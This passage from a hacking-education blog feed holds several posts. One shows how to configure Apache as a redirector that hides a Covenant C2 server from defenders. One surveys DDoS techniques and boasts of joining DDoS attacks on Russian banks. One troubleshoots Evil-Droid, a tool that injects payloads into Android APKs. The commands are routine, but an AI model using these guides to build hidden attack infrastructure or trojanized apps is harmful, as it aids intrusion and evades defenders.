  647. <figure><img src="https://static.wixstatic.com/media/6a4a49_d8b780ab04644d519ee6bce09d01acf2~mv2.png/v1/fit/w_493,h_441,al_c,q_80/file.png"></figure>
  648. <p><br /></p>
  649. <figure><img src="https://static.wixstatic.com/media/6a4a49_ca9915e83bb3462699d9460486757602~mv2.png/v1/fit/w_1000,h_842,al_c,q_80/file.png"></figure>
  650. <p><br /></p>
  651. <h2><strong>Step #2: Message a Friend</strong></h2>
  652. <p><br /></p>
  653. <p>Get your friend’s public key, including the lines where it says &quot;BEGIN PGP PUBLIC KEY BLOCK&quot; and &quot;END PGP PUBLIC KEY BLOCK&quot; and save it with extension .asc.</p>
  654. <p><br /></p>
  655. <p><br /></p>
  656. <figure><img src="https://static.wixstatic.com/media/6a4a49_a6f311a1d5e646f8857d8aff179fa2eb~mv2.png/v1/fit/w_894,h_747,al_c,q_80/file.png"></figure>
  657. <p><br /></p>
  658. <p>Then import the file to Kleopatra.</p>
  659. <p><br /></p>
  660. <figure><img src="https://static.wixstatic.com/media/6a4a49_f080305eb5b74da6a815673c501c3513~mv2.png/v1/fit/w_467,h_507,al_c,q_80/file.png"></figure>
  661. <p><br /></p>
  662. <p>Click in Kleopatra on Notepad and write a message.</p>
  663. <p><br /></p>
  664. <p><br /></p>
  665. <figure><img src="https://static.wixstatic.com/media/6a4a49_c0b323917938440a8359534ae4317457~mv2.png/v1/fit/w_1000,h_374,al_c,q_80/file.png"></figure>
  666. <p><br /></p>
  667. <p>Choose who would sign this cipher and for whom to encrypt it and click “Sign/Encrypt Notepad”</p>
  668. <p><br /></p>
  669. <p><br /></p>
  670. <figure><img src="https://static.wixstatic.com/media/6a4a49_ff602f7189ae4753bd33964dd7866be5~mv2.png/v1/fit/w_1000,h_482,al_c,q_80/file.png"></figure>
  671. <p><br /></p>
  672. <p><br /></p>
  673. <p>To give someone else your public key, just right-click on the certificates and use “Export” to export the public key and “Export Secret Keys” to the export private key.</p>
  674. <p><br /></p>
  675. <p><br /></p>
  676. <figure><img src="https://static.wixstatic.com/media/6a4a49_283bfbfffda24bf892d077d4b3f2c987~mv2.png/v1/fit/w_1000,h_559,al_c,q_80/file.png"></figure>
  677. <p><br /></p>
  678. <p><br /></p>
  679. <p>When the recipient receives it, they  need to enter a passphrase to decrypt the cipher (of course if they have the private key).</p>
  680. <p><br /></p>
  681. <p><br /></p>
  682. <figure><img src="https://static.wixstatic.com/media/6a4a49_77f67208eb2a4b929cbaef62621e835c~mv2.png/v1/fit/w_1000,h_505,al_c,q_80/file.png"></figure>
  683. <p><br /></p>
  684. <p><br /></p>
  685. <h2><strong> Summary</strong></h2>
  686. <p><br /></p>
  687. <p>This article explores the use of Pretty Good Privacy (PGP) encryption in Tails OS. PGP is a powerful tool for securing your digital communications and data. It can help you protect your data, communications, and online identities, making it an indispensable tool for those seeking heightened security in an era of increasing digital threats and privacy concerns.</p>]]></content:encoded></item><item><title><![CDATA[Command &#38; Control Series Part III (Installing your Redirector)]]></title><description><![CDATA[In the dynamic landscape of cybersecurity operations, the use of Command and Control (C2) servers stands as a critical component for...]]></description><link>https://www.hackers-arise.com/post/command-control-series-part-iii-installing-your-redirector</link><guid isPermaLink="false">654406c5a6c3b91cc361efde</guid><pubDate>Wed, 08 Nov 2023 16:09:45 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  688. <figure><img src="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png"></figure>
  689. <p><br /></p>
  690. <p><br /></p>
  691. <p style="text-align: justify;"><span style="color: #374151;">In the dynamic landscape of cybersecurity operations, the use of Command and Control (C2) servers stands as a critical component for orchestrating coordinated tasks across compromised systems. However, directly interacting with a C2 can often leave an operator exposed to detection and countermeasures. This is where the strategic implementation of a redirector plays a pivotal role. </span></p>
  692. <p><br /></p>
  693. <p style="text-align: justify;"><span style="color: #374151;">A redirector acts as an intermediary, designed to conceal the true endpoint of a C2 by channeling the communication through seemingly benign relay points. By using a redirector, threat actors can obfuscate their traffic, thereby complicating the defensive efforts to trace malicious activities back to the source. </span></p>
  694. <p><br /></p>
  695. <p style="text-align: justify;"><span style="color: #374151;">The redirector not only masks the C2 traffic to evade network defenses but also adds a layer of resilience, ensuring that the core infrastructure remains hidden and operative despite adversarial disruptions. In this post, we&apos;ll delve into how a redirector can be set up using Apache2, an adaptable and robust platform that provides the necessary features to construct a deceptive front, safeguarding your C2 behind a veil of regular internet noise. In this article, we are going to install our own Redirector to interact with our C2.</span></p>
  696. <p><br /></p>
  697. <p style="text-align: justify;"><span style="color: #374151;">In this case, I&apos;m using Ubuntu but it </span>works<span style="color: #374151;"> for other Linux </span>distributions<span style="color: #374151;"> as well. Go to your terminal and execute the following commands:</span></p>
  698. <ol>
  699.  <li><p><span style="color: #67ed1a;"><span style="background-color: #000000;">sudo a2enmod rewrite proxy proxy_http proxy_connect</span></span>
  700. </p></li>
  701. </ol>
  702. <figure><img src="https://static.wixstatic.com/media/6a4a49_290871f8fc954dd7b170ea8b5d85d43f~mv2.png/v1/fit/w_1000,h_266,al_c,q_80/file.png"></figure>
  703. <p><br /></p>
  704. <p>This line runs multiple a2enmod commands, which are scripts specific to Apache on Debian-based systems for enabling modules within Apache’s configuration. But let me explain to you what is this command.</p>
  705. <ul>
  706.  <li><p style="text-align: justify;"><strong>rewrite: </strong>This is a module that allows for the rewriting of URLs according to specified rules. This capability is particularly useful for conditionally redirecting traffic. In the context of a C2 redirector, you might use rewrite rules to only redirect traffic that meets certain criteria, effectively making your C2 communications less conspicuous.</p></li>
  707.  <li><p style="text-align: justify;"><strong>proxy: </strong>This module provides basic support for running Apache as either a reverse proxy or a forward proxy. A reverse proxy takes requests from the internet and forwards them to servers in an internal network. In C2 operations, a reverse proxy can forward traffic to a hidden C2 server, while the proxy itself can be configured to minimize suspicious patterns in traffic that might be detected by defensive measures.</p></li>
  708.  <li><p style="text-align: justify;"><strong>proxy_http:</strong> This module extends Apache’s proxying capabilities over HTTP and HTTPS. For a C2 redirector, it’s vital because it allows the forwarding of client requests to the actual C2 server over these common web protocols.</p></li>
  709.  <li><p style="text-align: justify;"><strong>proxy_connect: </strong>This module enables the use of the CONNECT method, typically used for tunneling through a proxy server. This method is important for setting up SSL connections through the proxy, which can be a necessary part of securely managing C2 communications without revealing the traffic content to intermediate network security appliances.</p></li>
  710. </ul>
  711. <p><br /></p>
  712. <p>2.<span style="color: #67ed1a;"><span style="background-color: #000000;"> sudo a2ensite 000-default.conf</span></span></p>
  713. <p><br /></p>
  714. <figure><img src="https://static.wixstatic.com/media/6a4a49_e581a88fbe9244a4b349d00a47e57f83~mv2.png/v1/fit/w_928,h_35,al_c,q_80/file.png"></figure>
  715. <p style="text-align: justify;">
  716. <strong>a2ensite:</strong> is yet another script that enables a site within Apache. 000-default.conf is the default virtual host configuration file in Apache. When this command is executed, it creates a symbolic link for this configuration file from the sites-available directory (/etc/apache2/sites-available/) to the sites-enabled directory (/etc/apache2/sites-enabled/), which tells Apache to load this configuration on startup.</p>
  717. <p><br /></p>
  718. <p>3.<span style="color: #67ed1a;"><span style="background-color: #000000;"> sudo sudo service apache2 restart</span></span></p>
  719. <p><br /></p>
  720. <figure><img src="https://static.wixstatic.com/media/6a4a49_764eee454de34f25a53affd32ab7e467~mv2.png/v1/fit/w_901,h_27,al_c,q_80/file.png"></figure>
  721. <p><br /></p>
  722. <p>4.<span style="color: #67ed1a;"><span style="background-color: #000000;"> sudo vim /etc/apache2/sites-enabled/000-default.conf</span></span>
  723. </p>
  724. <figure><img src="https://static.wixstatic.com/media/6a4a49_567c15c42f8241f999d6ec81b05dc155~mv2.png/v1/fit/w_1000,h_42,al_c,q_80/file.png"></figure>
  725. <p><br /></p>
  726. <p style="text-align: justify;">This command opens the 000-default.conf file in vim, which is a highly configurable text editor. It allows you to modify the configuration of the default virtual host for the Apache server.</p>
  727. <p><br /></p>
  728. <figure><img src="https://static.wixstatic.com/media/6a4a49_9a378d3445c2428da5833823797644de~mv2.png/v1/fit/w_1000,h_506,al_c,q_80/file.png"></figure>
  729. <p><br /></p>
  730. <p style="text-align: justify;">Inside you will write the following lines:</p>
  731. <p><br /></p>
  732. <figure><img src="https://static.wixstatic.com/media/6a4a49_72c0d66c99724ce593b8fb7888180f73~mv2.png/v1/fit/w_1000,h_622,al_c,q_80/file.png"></figure>
  733. <p><br /></p>
  734. <p><br /></p>
  735. <p style="text-align: justify;"><strong>ProxyRequests Off:</strong> This directive disables forward (standard) proxy requests, meaning that the server will not proxy arbitrary requests from clients. This is typically set to &apos;Off&apos; for a reverse proxy, which is what you&apos;re configuring here. A reverse proxy is intended to proxy requests to predefined destinations (in this case, the C2 server), rather than acting as a general-purpose proxy server.</p>
  736. <p><br /></p>
  737. <p style="text-align: justify;"><strong>ProxyPass /en-us/index.html http://xxx.xxx.xxx.xxx/en-us/index.html:</strong> This line sets up a proxy pass rule. When the Apache server receives a request for /en-us/index.html, it will forward this request to http://xxx.xxx.xxx.xxx/en-us/index.html, where xxx.xxx.xxx.xxx is the IP address of your Covenant C2 server. This means that anyone who navigates to /en-us/index.html on the Apache server will be served the content from the Covenant server instead, without direct exposure of the C2 server&apos;s IP address.</p>
  738. <p><br /></p>
  739. <p style="text-align: justify;"><strong>ProxyPassReverse /en-us/index.html http://xxx.xxx.xxx.xxx/en-us/index.html:</strong> The ProxyPassReverse directive is used in conjunction with ProxyPass and is crucial for handling HTTP headers of responses coming from the C2 server. When responses are sent back to the client, this directive rewrites any headers referring to the C2 server&apos;s internal IP address so that they point to the proxy server&apos;s address instead. This ensures that the client&apos;s experience remains seamless and that the actual location of the C2 server remains hidden.</p>
  740. <p><br /></p>
  741. <p style="text-align: justify;"><strong>ProxyPass /en-us/docs.html http://xxx.xxx.xxx.xxx/en-us/docs.html and ProxyPassReverse /en-us/docs.html http://xxx.xxx.xxx.xxx/en-us/docs.html:</strong> These directives are similar to the previous ProxyPass and ProxyPassReverse directives but apply to the /en-us/docs.html path. Each pair is responsible for proxying a different path on the server, allowing you to have multiple proxied pages, each possibly serving a different function or hosting different content relevant to the operation of the C2 server.</p>
  742. <p><br /></p>
  743. <p style="text-align: justify;"><strong>ProxyPass /en-us/test.html http://xxx.xxx.xxx.xxx/en-us/test.html and ProxyPassReverse /en-us/test.html http://xxx.xxx.xxx.xxx/en-us/test.html:</strong> Again, these directives serve the same purpose as the earlier ProxyPass and ProxyPassReverse pairs but are applied to the /en-us/test.html path. They direct traffic destined for that path to the corresponding path on the C2 server.</p>
  744. <p><br /></p>
  745. <p style="text-align: justify;">These configurations essentially turn your Apache server into a specialized reverse proxy for your Covenant C2 server, with the goal of obfuscating the origin of the C2 communications. It is designed to make the traffic appear as if it is directed to and coming from the proxy server, thereby helping to mask the presence and location of the actual C2 server.</p>
  746. <p><br /></p>
  747. <p>That is it, you are ready to operate. Next time I will show you how to use your Covenant C2 Server with this Redirector. </p>
  748. <p><br /></p>
  749. <p>Also, make sure you check:</p>
  750. <h2><u><a href="https://www.hackers-arise.com/post/command-control-series-part-i-installing-your-own-c2-server-on-kali-linux" target="_blank"><span style="color: #0D12E9;"><strong>Command &amp; Control Series Part I (Installing your own C2 Server on Kali Linux)</strong></span></a></u> </h2>
  751. <h2><u><a href="https://www.hackers-arise.com/post/command-control-series-part-ii-operating-your-own-c2-server" target="_blank"><span style="color: #0D12E9;"><strong>Command &amp; Control Series Part II (Operating your own C2 Server)</strong></span></a></u> </h2>
  752. <p><br /></p>
  753. <p style="text-align: justify;"><em><strong>Smouk out!</strong></em></p>
  754. <p><br /></p>
  755. <p style="text-align: justify;">
  756. <em>If you liked what you saw, you might be interested in our </em><em><strong>Hacking Infrastructure course</strong></em><em>, or perhaps you&apos;d like to consider becoming part of our community by becoming a</em><u><a href="www.hackers-arise.com/subscriber-pro" target="_blank"><em><span style="color: #0D12E9;"> </span></em></a></u><u><a href="www.hackers-arise.com/subscriber-pro" target="_blank"><em><span style="color: #0D12E9;"><strong>Subscriber PRO.</strong></span></em></a></u><span style="color: #0D12E9;"> </span></p>
  757. <p><br /></p>
  758. <p><br /></p>
  759. <figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
  760. <p><br /></p>
  761. <p><br /></p>
  762. <p><br /></p>
  763. <p><br /></p>
  764. <p><br /></p>
  765. <p><br /></p>
  766. <p><br /></p>
  767. <p><br /></p>
  768. <p><br /></p>
  769. <p><br /></p>
  770. <p><br /></p>
  771. <p><br /></p>
  772. <p><br /></p>
  773. <p><br /></p>
  774. <p><br /></p>
  775. <p><br /></p>
  776. <p><br /></p>
  777. <p><br /></p>
  778. <p><br /></p>
  779. <p><br /></p>
  780. <p><br /></p>
  781. <p><br /></p>
  782. <p><br /></p>
  783. <p><br /></p>
  784. <p><br /></p>
  785. <p><br /></p>
  786. <p><br /></p>
  787. <p><br /></p>
  788. <p><br /></p>
  789. <p><br /></p>
  790. <p><br /></p>
  791. <p><br /></p>
  792. <p><br /></p>
  793. <p><br /></p>
  794. <p><br /></p>
  795. <p><br /></p>
  796. <p><br /></p>
  797. <p><br /></p>
  798. <p><br /></p>
  799. <p><br /></p>
  800. <p><br /></p>
  801. <p><br /></p>
  802. <p><br /></p>
  803. <p><br /></p>
  804. <p><br /></p>
  805. <p><br /></p>
  806. <p><br /></p>
  807. <p><br /></p>
  808. <p><br /></p>
  809. <p><br /></p>
  810. <p><br /></p>
  811. <p><br /></p>
  812. <p><br /></p>
  813. <p><br /></p>
  814. <p><br /></p>
  815. <p><br /></p>
  816. <p><br /></p>
  817. <p><br /></p>
  818. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[The Return of the Devastating DDoS Attacks or The Revenge of the IoT]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! As you well know, the Distributed Denial of Service (DDoS) attack is one of simplest attacks. It...]]></description><link>https://www.hackers-arise.com/post/the-return-of-devastating-ddos-attacks-the-revenge-of-the-iot</link><guid isPermaLink="false">654953fbf020b109c1b3f133</guid><pubDate>Tue, 07 Nov 2023 21:34:28 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_5d2a867dbb7b4605a7dddabe83f2ae18~mv2.gif/v1/fit/w_800,h_490,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  819. <p><br /></p>
  820. <p>Welcome back, my aspiring cyberwarriors!</p>
  821. <p><br /></p>
  822. <p>As you well know, the Distributed Denial of Service (DDoS) attack is one of simplest attacks. It is simply brute-force packet jamming a network to render it useless or nearly useless. When its done with just a few nodes it can be easily thwarted by a number techniques such as load balancing, black hole routing, rate limiting and many  newer intelligent systems techniques. The impact is minimal. </p>
  823. <p><br /></p>
  824. <figure><img src="https://static.wixstatic.com/media/6a4a49_5d2a867dbb7b4605a7dddabe83f2ae18~mv2.gif/v1/fit/w_800,h_490,al_c,q_80/file.png"></figure>
  825. <p><br /></p>
  826. <p><br /></p>
  827. <p><br /></p>
  828. <h2><strong>Massive Numbers of Compromised IoT Devices </strong></h2>
  829. <p><br /></p>
  830. <p>When it done with a massive number of nodes, nearly everything is vulnerable. Millions of IoT devices have been compromised due to VERY lax security for these devices. Any IoT device such cameras, security systems, and baby monitors can become an attack vector used to create a massive attack that would crush any network. Nothing would be safe. This is a vastly overlooked issue in our time of IoT devices. We may be ready to pay a heavy price for such oversight. This keeps me awake at night and I think it should keep you awake too!</p>
  831. <p><br /></p>
  832. <h2><strong>New DDoS Techniques</strong></h2>
  833. <p><br /></p>
  834. <p> In addition, new techniques have made DDoS even more deadly. Distributed Denial of Service (DDoS) attacks have become increasingly sophisticated, with attackers continually developing new techniques to circumvent traditional defense mechanisms. Some of the latest DDoS attack techniques and trends include:</p>
  835. <p><br /></p>
  836. <ol>
  837.  <li><p><strong>Multi-Vector Attacks</strong>: Modern DDoS attacks often combine several attack vectors at once, making them more difficult to defend against. Attackers may simultaneously use volumetric attacks, protocol attacks, and application layer attacks to overwhelm systems in different ways.</p></li>
  838.  <li><p><strong>Amplification Techniques</strong>: Attackers continue to use amplification to increase the volume of their attacks. They exploit the communication protocols that respond with more data than they receive (like DNS, NTP, SSDP, CLDAP, and memcached) to send small queries that provoke much larger responses to the targeted system.</p></li>
  839.  <li><p><strong>Burst Attacks</strong>: These are short-duration attacks that come in quick bursts, intended to disrupt service without triggering DDoS mitigation which often requires a sustained attack before it activates. Burst attacks can be particularly damaging for services that require high availability.</p></li>
  840.  <li><p><strong>IoT Botnets</strong>: Insecure Internet of Things (IoT) devices are increasingly being co-opted into botnets. These botnets are used to mount large-scale DDoS attacks, as seen with the Mirai botnet and its variants. Because there are so many IoT devices with poor security, they provide a vast attack surface for malicious actors.</p></li>
  841.  <li><p><strong>AI and Machine Learning</strong>: Some attackers are beginning to use AI and machine learning to automate the process of finding and exploiting vulnerabilities, as well as to adapt in real-time to defensive measures, making their attacks more effective and persistent.</p></li>
  842.  <li><p><strong>SSL/TLS Exploits</strong>: Attacks are increasingly targeting the encrypted traffic of SSL/TLS protocols. These attacks require more processing power to mitigate because the defensive systems must decrypt the incoming data to inspect it, which can be resource-intensive.</p></li>
  843.  <li><p><strong>Direct Path Attacks</strong>: These attacks bypass common DDoS protection by targeting the IP address of individual network interfaces. This is particularly a risk for cloud services, where the IP address can be exposed through various methods.</p></li>
  844.  <li><p><strong>Ransom DDoS (RDoS)</strong>: Here, attackers threaten to launch a DDoS attack or start a small-scale attack unless a ransom is paid. The fear of a potential large-scale DDoS can pressure organizations into paying.</p></li>
  845.  <li><p><strong>Supply Chain and Dependency Attacks</strong>: Attackers target less-secure elements of an organization&apos;s supply chain, including third-party services and APIs, understanding that disrupting these can have knock-on effects on the primary target.</p></li>
  846.  <li><p><strong>State-Sponsored Attacks</strong>: Some of the most sophisticated DDoS attacks are suspected to be carried out by state-sponsored actors, often as part of broader cyberwarfare strategies. These attacks may target critical infrastructure or be used as a distraction for other types of cyber intrusions.</p></li>
  847. </ol>
  848. <p><br /></p>
  849. <h2><strong>The Greatest DDoS Attacks in History</strong></h2>
  850. <p><br /></p>
  851. <p>To better understand the incredible weight that a massive DDoS attack might have, let&apos;s consider the greatest DDoS attacks in history.</p>
  852. <p><br /></p>
  853. <p><strong>BBC – December 2015</strong></p>
  854. <p><br /></p>
  855. <p>The BBC&apos;s entire domain, including  its website and iPlayer service, was brought down by an attack that was  believed to be around 600 Gbps.</p>
  856. <p><br /></p>
  857. <p><strong>Krebs on Security – September 2016</strong> </p>
  858. <p><br /></p>
  859. <p>Security journalist  Brian Krebs&apos; website was hit by a DDoS attack that peaked at 620 Gbps.  It was later found that this attack was also carried out by the Mirai  botnet.</p>
  860. <p><br /></p>
  861. <p><strong>Spamhaus – March 2013</strong>: </p>
  862. <p><br /></p>
  863. <p>Spamhaus, a non-profit  organization that fights spam, was targeted by an attack that reached  300 Gbps. The attackers used a DNS reflection technique, which was, at  the time, one of the largest-known DDoS attacks.</p>
  864. <p><br /></p>
  865. <p><strong>GitHub – February 2018</strong>: </p>
  866. <p><br /></p>
  867. <p>GitHub was hit by a DDoS attack  that peaked at 1.35 Tbps. This attack was notable because it was  powered by an amplification attack exploiting memcached servers, which  returned large volumes of data to the targeted IP address in response to  small queries.</p>
  868. <p><br /></p>
  869. <p><strong>Dyn – October 2016</strong></p>
  870. <p><br /></p>
  871. <p>A major attack targeted the DNS  provider Dyn and peaked at an estimated 1.2 Tbps. This attack caused  major internet platforms and services to be unavailable to large swathes  of users in Europe and North America. The attack was attributed to a  large network of IoT devices (such as cameras and home routers) that had  been hijacked by the Mirai botnet.</p>
  872. <p><br /></p>
  873. <p><strong>Google – September 2017</strong>: </p>
  874. <p><br /></p>
  875. <p>Google revealed that in 2017  it had defended against a DDoS attack that peaked at 2.54 Tbps, which at  the time of the revelation made it the largest DDoS attack in history,  surpassing the attack against AWS.</p>
  876. <p><br /></p>
  877. <p><strong>Amazon Web Services (AWS) – February 2020</strong>: </p>
  878. <p><br /></p>
  879. <p>AWS reported  a DDoS attack that peaked at 2.3 terabits per second (Tbps), the  largest ever reported at the time. The attack was a Connection-less  Lightweight Directory Access Protocol (CLDAP) reflection-based attack, a  type of attack that exploits a vulnerability in CLDAP servers to  amplify the amount of data sent to the victim&apos;s network.</p>
  880. <p><br /></p>
  881. <h2><strong>The Cyberwar DDoS Attack Against Russia February-March 2022</strong></h2>
  882. <p><br /></p>
  883. <p>Although no one knows for certain the precise number of packets directed at Russia at the outset of the war, Russia stated that this was the largest DDoS attack in their history.</p>
  884. <p><br /></p>
  885. <p>Read what Bleeping Computer reported on the attack below.</p>
  886. <p><br /></p>
  887. <p><u><a href="https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/" target="_blank"><span style="color: #0D12E9;">https://www.bleepingcomputer.com/news/security/russia-s-largest-isp-says-2022-broke-all-ddos-attack-records/</span></a></u><span style="color: #0D12E9;"> </span></p>
  888. <p><br /></p>
  889. <p>The most powerful of these DDoS attacks was recorded by Rostelecom--the Russian Telecom giant--was 760 GB/sec, almost twice as big as the most potent attack of the previous year, while also the longest, lasting nearly three months.</p>
  890. <p><br /></p>
  891. <p>We, at Hackers-Arise, the IT Army of Ukraine and hackers across the planet participated in the largest DDoS attack in history. For nearly three months, we crushed Russia&apos;s major institutions such as SberBank, the Moscow Stock Exchange, the distribution of alcoholic beverages throughout Russia (heaven forbid! A Russia without vodka!) and many other major institutions.</p>
  892. <p><br /></p>
  893. <p>Russia estimates that 17,000 IP addresses attacked them and they have vowed to exact revenge on all 17,000 of us.  Imagine what would have happened if someone had used millions of IoT devices?</p>
  894. <p><br /></p>
  895. <p><br /></p>
  896. <h2><strong>Summary</strong></h2>
  897. <p><br /></p>
  898. <p>These figures for each of these attacks represent the peak sizes as reported, but  it&apos;s worth noting that the actual impact of a DDoS attack is not solely  determined by its size. The sophistication of the attack, the defenses  in place, and the duration of the attack are all critical factors that  influence the overall effect.</p>
  899. <p><br /></p>
  900. <p>I believe we are on the cusp of massive DDoS attacks from IoT devices that will cripple major institutions around the globe.</p>
  901. <p><br /></p>
  902. <p>What are you doing to prepare?</p>]]></content:encoded></item><item><title><![CDATA[The Ultimate Guide to Troubleshooting your Evil-Droid problems]]></title><description><![CDATA[If you've ever used Evil-Droid, you've probably encountered a variety of issues to solve. In order to save you from wandering all over...]]></description><link>https://www.hackers-arise.com/post/the-ultimate-guide-to-troubleshooting-your-evil-droid-problems</link><guid isPermaLink="false">6543bd450b6ed7670d97ca3b</guid><pubDate>Mon, 06 Nov 2023 20:44:48 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_3d6413ae2c7049bc9d58a8ee97c7db3d~mv2.png/v1/fit/w_1000,h_960,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  903. <figure><img src="https://static.wixstatic.com/media/6a4a49_3d6413ae2c7049bc9d58a8ee97c7db3d~mv2.png/v1/fit/w_1000,h_960,al_c,q_80/file.png"></figure>
  904. <p><br /></p>
  905. <p style="text-align: justify;"><span style="color: #374151;">If you&apos;ve ever used Evil-Droid, you&apos;ve probably encountered a variety of issues to solve. In order to save you from wandering all over the internet searching for forums and videos to separately address each of these problems, we have created this post so that you can use this powerful tool without any further hassle.</span></p>
  906. <p><br /></p>
  907. <p style="text-align: justify;"><span style="color: #374151;">We&apos;ll assume that you successfully installed the tool, and you won&apos;t encounter any major complications, also the procedure is clearly detailed on this website </span><u><a href="https://github.com/M4sc3r4n0/Evil-Droid" target="_blank"><span style="color: #0D12E9;"><strong>Official Evil-Droid</strong></span></a></u></p>
  908. <p><br /></p>
  909. <p style="text-align: justify;"><span style="color: #374151;">The first common error to encounter is the &quot;Connection Failed&quot; error. </span></p>
  910. <p><br /></p>
  911. <figure><img src="https://static.wixstatic.com/media/6a4a49_a4e9fef15f2d4e0badc7cc5c6ef2213c~mv2.png/v1/fit/w_311,h_82,al_c,q_80/file.png"></figure>
  912. <p><br /></p>
  913. <p style="text-align: justify;"><span style="color: #E51932;"><span style="background-color: #000000;"><strong>Chapter 1: Connection Failed</strong></span></span></p>
  914. <p><br /></p>
  915. <p style="text-align: justify;"><span style="color: #374151;">To resolve this issue, we will execute the following commands.</span></p>
  916. <p><br /></p>
  917. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>cd Evil-Droid</strong></span></span></p>
  918. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>sudo nano evil-droid</strong></span></span></p>
  919. <p><br /></p>
  920. <p style="text-align: justify;"><span style="color: #374151;">Make sure your configuration file looks like the image below.</span></p>
  921. <p style="text-align: justify;"><span style="color: #4d5156;">(It could be also: ≠ 0 or =1 you choose.)</span></p>
  922. <p><br /></p>
  923. <figure><img src="https://static.wixstatic.com/media/6a4a49_5617fa74799942bc873f52d8166d3101~mv2.png/v1/fit/w_868,h_539,al_c,q_80/file.png"></figure>
  924. <p><br /></p>
  925. <p style="text-align: justify;">Then save and exit:</p>
  926. <p><br /></p>
  927. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>ctrl + g + enter</strong></span></span></p>
  928. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>ctrl + x + enter</strong></span></span></p>
  929. <p><br /></p>
  930. <p style="text-align: justify;"><span style="color: #374151;">Now we solved the connection issue, but then you run the program and when you try to inject your first payload into the APK, and you encounter this error:</span></p>
  931. <p><br /></p>
  932. <figure><img src="https://static.wixstatic.com/media/6a4a49_61ba034b30a44035bf9fca01a1d156e8~mv2.png/v1/fit/w_520,h_304,al_c,q_80/file.png"></figure>
  933. <p><br /></p>
  934. <p><br /></p>
  935. <p style="text-align: justify;"><span style="color: #E51932;"><span style="background-color: #000000;"><strong>Chapter 2. [!] Failed to verify signed artifacts</strong></span></span></p>
  936. <p><br /></p>
  937. <p style="text-align: justify;"><span style="color: #374151;">To solve this issue, the first thing we will do is go to the following address: </span><u><a href="https://bitbucket.org/iBotPeaches/apktool/downloads/" target="_blank"><span style="color: #0D12E9;"><strong>https://bitbucket.org/iBotPeaches/apktool/downloads/</strong></span></a></u><span style="color: #374151;">.</span></p>
  938. <p style="text-align: justify;"><span style="color: #374151;">From there, you will download the .jar file of Apktool, version 2.4.1 (I tested a lot of them but that is the one that worked for me). </span></p>
  939. <p><br /></p>
  940. <figure><img src="https://static.wixstatic.com/media/6a4a49_30222fc72aa944acb5090c389d75995f~mv2.png/v1/fit/w_1000,h_54,al_c,q_80/file.png"></figure>
  941. <p><br /></p>
  942. <p style="text-align: justify;">Now go to:</p>
  943. <p><br /></p>
  944. <figure><img src="https://static.wixstatic.com/media/6a4a49_6156a171294f4fa8a277cc3432847343~mv2.png/v1/fit/w_297,h_164,al_c,q_80/file.png"></figure>
  945. <p><br /></p>
  946. <p style="text-align: justify;"><span style="color: #374151;">Now you should replace the existing .jar file with the one you downloaded and rename it to be called apktool.jar. After that, open the attached text file and input the version (2.4.1), save</span> it<span style="color: #374151;">, and close it.</span></p>
  947. <p><br /></p>
  948. <figure><img src="https://static.wixstatic.com/media/6a4a49_a6be14d09e6e44da817dd53af6796e8c~mv2.png/v1/fit/w_373,h_213,al_c,q_80/file.png"></figure>
  949. <p><br /></p>
  950. <p><br /></p>
  951. <p style="text-align: justify;"><span style="color: #374151;">Before proceeding to run the application again, we must perform another step, which is choosing the specific version of JDK that works with this apktool.jar. In this case, it is </span>the <span style="color: #374151;">version 11.</span></p>
  952. <p><br /></p>
  953. <p style="text-align: justify;"><span style="color: #374151;">Here are the commands:</span></p>
  954. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>sudo apt-get install openjdk-11-jdk-headless</strong></span></span></p>
  955. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #000000;"><strong>sudo update-alternatives --config java</strong></span></span></p>
  956. <p><br /></p>
  957. <p style="text-align: justify;"><span style="color: #374151;">Choose option 1, which corresponds to version 11.</span></p>
  958. <p><br /></p>
  959. <figure><img src="https://static.wixstatic.com/media/6a4a49_c48f9bf7617145f190db0f7169bf72b8~mv2.png/v1/fit/w_707,h_189,al_c,q_80/file.png"></figure>
  960. <p><br /></p>
  961. <p style="text-align: justify;"><span style="color: #374151;">Now, run the Evil Droid program again, and you will see that before proceeding with the verification, it will ask you a series of questions (as shown in the figure below), to which you can respond using the example from the picture.</span></p>
  962. <p><br /></p>
  963. <figure><img src="https://static.wixstatic.com/media/6a4a49_7f7407aae1f74280b92943ca6af12045~mv2.png/v1/fit/w_583,h_516,al_c,q_80/file.png"></figure>
  964. <p><br /></p>
  965. <p><br /></p>
  966. <p style="text-align: justify;"><span style="color: #374151;">If everything goes well, it will proceed with verification and signing. However, it&apos;s also possible that you may encounter the following error, as shown in the picture below. This error tends to occur after resolving the previous one.</span></p>
  967. <p><br /></p>
  968. <figure><img src="https://static.wixstatic.com/media/6a4a49_1fea62ea1b904355ba0eeb5394f09f5b~mv2.png/v1/fit/w_985,h_322,al_c,q_80/file.png"></figure>
  969. <p><br /></p>
  970. <p><br /></p>
  971. <p style="text-align: justify;"><span style="color: #E51932;"><span style="background-color: #000000;"><strong>Chapter 3. [!] Failed to align recompiled APK</strong></span></span></p>
  972. <p><br /></p>
